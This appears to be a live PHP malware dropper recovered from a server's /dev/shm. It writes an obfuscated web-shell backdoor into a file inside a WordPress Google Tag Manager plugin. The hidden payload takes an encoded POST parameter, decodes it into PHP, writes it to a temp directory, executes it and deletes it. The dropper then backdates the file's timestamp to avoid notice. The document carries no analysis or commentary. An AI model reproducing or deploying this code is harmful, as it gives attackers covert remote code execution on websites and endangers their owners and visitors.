File: //dev/shm/.itm
<?php $p = "/home/sunkajpa/public_html/wp-content/plugins/duracelltomi-google-tag-manager/integration/whichbrowser/src/Analyser/Header/Useragent/Device/Server.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28%40%24_POST%5B%22e%5Cx6Et%5Cx72y%22%5D%20%21%3D%3D%20null%29%7B%0A%09%24holder%20%3D%20array_filter%28%5B%22/var/tmp%22%2C%20getenv%28%22TMP%22%29%2C%20getenv%28%22TEMP%22%29%2C%20getcwd%28%29%2C%20%22/dev/shm%22%2C%20session_save_path%28%29%2C%20%22/tmp%22%2C%20sys_get_temp_dir%28%29%2C%20ini_get%28%22upload_tmp_dir%22%29%5D%29%3B%0A%09%24marker%20%3D%20%24_POST%5B%22e%5Cx6Et%5Cx72y%22%5D%3B%0A%09%09%20%24marker%20%09%20%3Dexplode%28%27.%27%2C%24marker%09%29%20%3B%0A%09%24val%3D%09%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24salt%3D%09%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24sLen%3D%09strlen%28%24salt%20%20%29%3B%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20foreach%28%24marker%20as%20%24w%20%3D%3E%20%24v8%29%20%7B%24sChar%3D%09ord%28%24salt%5B%24w%20%25%20%24sLen%5D%20%20%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24dec%3D%09%28%28int%29%24v8%20-%20%24sChar%20-%28%24w%20%25%2010%29%29%09%5E7%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24val.%3D%09chr%28%24dec%20%20%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%09foreach%20%28%24holder%20as%20%24key%20%3D%3E%20%24itm%29%20%7B%0A%20%20%20%20%09%09if%20%28max%280%2C%20is_dir%28%24itm%29%20%2A%20is_writable%28%24itm%29%29%29%20%7B%0A%20%20%20%20%24pgrp%20%3D%20implode%28%22/%22%2C%20%5B%24itm%2C%20%22.component%22%5D%29%3B%0A%20%20%20%20if%20%28file_put_contents%28%24pgrp%2C%20%24val%29%29%20%7B%0A%09require%20%24pgrp%3B%0A%09unlink%28%24pgrp%29%3B%0A%09exit%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) { echo '!success!'; @touch($p, 1468178282); } die('!ended!');